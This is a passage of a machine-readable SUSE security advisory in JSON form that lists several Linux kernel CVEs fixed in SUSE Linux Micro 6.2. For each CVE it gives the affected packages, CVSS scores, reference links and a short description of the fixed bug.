"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2025-71066"
},
{
"cve": "CVE-2025-71073",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71073"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: lkkbd - disable pending work before freeing device\n\nlkkbd_interrupt() schedules lk-\u003etq via schedule_work(), and the work\nhandler lkkbd_reinit() dereferences the lkkbd structure and its\nserio/input_dev fields.\n\nlkkbd_disconnect() and error paths in lkkbd_connect() free the lkkbd\nstructure without preventing the reinit work from being queued again\nuntil serio_close() returns. This can allow the work handler to run\nafter the structure has been freed, leading to a potential use-after-free.\n\nUse disable_work_sync() instead of cancel_work_sync() to ensure the\nreinit work cannot be re-queued, and call it both in lkkbd_disconnect()\nand in lkkbd_connect() error paths after serio_open().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71073",
"url": "https://www.suse.com/security/cve/CVE-2025-71073"
},
{
"category": "external",
"summary": "SUSE Bug 1256632 for CVE-2025-71073",
"url": "https://bugzilla.suse.com/1256632"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71073"
},
{
"cve": "CVE-2025-71076",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71076"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/oa: Limit num_syncs to prevent oversized allocations\n\nThe OA open parameters did not validate num_syncs, allowing\nuserspace to pass arbitrarily large values, potentially\nleading to excessive allocations.\n\nAdd check to ensure that num_syncs does not exceed DRM_XE_MAX_SYNCS,\nreturning -EINVAL when the limit is violated.\n\nv2: use XE_IOCTL_DBG() and drop duplicated check. (Ashutosh)\n\n(cherry picked from commit e057b2d2b8d815df3858a87dffafa2af37e5945b)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71076",
"url": "https://www.suse.com/security/cve/CVE-2025-71076"
},
{
"category": "external",
"summary": "SUSE Bug 1256627 for CVE-2025-71076",
"url": "https://bugzilla.suse.com/1256627"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71076"
},
{
"cve": "CVE-2025-71077",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71077"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntpm: Cap the number of PCR banks\n\ntpm2_get_pcr_allocation() does not cap any upper limit for the number of\nbanks. Cap the limit to eight banks so that out of bounds values coming\nfrom external I/O cause on only limited harm.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71077",
"url": "https://www.suse.com/security/cve/CVE-2025-71077"
},
{
"category": "external",
"summary": "SUSE Bug 1256613 for CVE-2025-71077",
"url": "https://bugzilla.suse.com/1256613"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71077"
},
{
